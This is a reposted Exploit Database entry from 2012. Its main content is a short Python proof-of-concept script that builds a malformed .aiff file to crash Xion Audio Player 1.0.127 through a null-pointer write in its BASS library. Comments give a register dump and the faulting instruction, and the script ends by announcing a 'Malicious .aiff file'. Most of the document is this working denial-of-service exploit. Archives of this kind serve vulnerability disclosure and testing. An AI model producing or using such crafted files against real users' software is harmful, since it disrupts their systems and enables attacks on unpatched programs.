Xion Audio Player 1.0.127 – ‘.aiff’ Denial of Service

• Exploit Database
• 17 阅读

• 作者： condis
  日期： 2012-04-04
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18698/

• #!/usr/bin/python
  
  # -------------------------------------------------------------------
  # Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability
  # found by condis
  #
  # Download: http://xion.r2.com.au/index.php?page=download
  # Tested on : Windows XP SP3 Professional PL
  #
  # Registers : 
  #
  # EAX 00000000
  # ECX 02D0B488
  # EDX 7C90E4F4 ntdll.KiFastSystemCallRet
  # EBX 02D0B4F8
  # ESP 02D0B4F8
  # EBP 02D0CA60
  # ESI 003D8D80
  # EDI 00001A00
  # EIP 11013C18 BASS.11013C18
  #
  # 11013C18 C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash
  #
  # "Access Violation while writing to 00000020"
  #
  # I've also found this kind of bug while playing around with .flac 
  # files so I think that handling all of the supported formats must be 
  # really messed up :<
  # --------------------------------------------------------------------
  
  evil= "FORM\x00\x00\x37\xA4AIFFCOMM"
  evil += "A" # <--- crash (rest of the file doesn't matters)
  
  aiff = open('xion-crash.aiff', 'w')
  aiff.write(evil)
  aiff.close()
  
  print "Malicious .aiff file has been created. Enjoy"